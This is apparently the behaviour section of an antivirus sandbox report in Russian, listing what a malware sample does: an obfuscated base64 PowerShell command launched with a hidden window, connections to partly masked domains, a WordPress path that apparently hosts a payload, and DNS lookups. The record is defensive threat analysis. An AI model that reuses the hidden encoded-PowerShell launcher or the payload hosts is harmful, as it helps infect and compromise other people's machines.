Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQgBsAG0AYwB6AHoAaABhAGoAcwBoAGMAawAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBTAGoAdgBxAHIAZgB5AGsAIAAjAD4AIAAkAEkAZABnAGYAZQBtAGEAbQA9ACcATABzAGoAcABjA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\1235184.cvr
- 'vi##.#ndonesia.nl':443
- 'de#####yle.ig.com.br':80
- 'de#####yle.ig.com.br':443
- 'pk#.goog':80
- 'ps########nterne.inscription.psl.eu':443
- http://de#####yle.ig.com.br/wp-content/languages/gtra6/
- http://pk#.goog/gsr1/gsr1.crt
- 'vi##.#ndonesia.nl':443
- 'de#####yle.ig.com.br':443
- 'ps########nterne.inscription.psl.eu':443
- DNS ASK ja#######ta.000webhostapp.com
- DNS ASK vi##.#ndonesia.nl
- DNS ASK de#####yle.ig.com.br
- DNS ASK pk#.goog
- DNS ASK ed######.embuguacu.sp.gov.br
- DNS ASK ps########nterne.inscription.psl.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQgBsAG0AYwB6AHoAaABhAGoAcwBoAGMAawAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBTAGoAdgBxAHIAZgB5AGsAIAAjAD4AIAAkAEkAZABnAGYAZQBtAGEAbQA9ACcATABzAGoAcABjA... (со скрытым окном)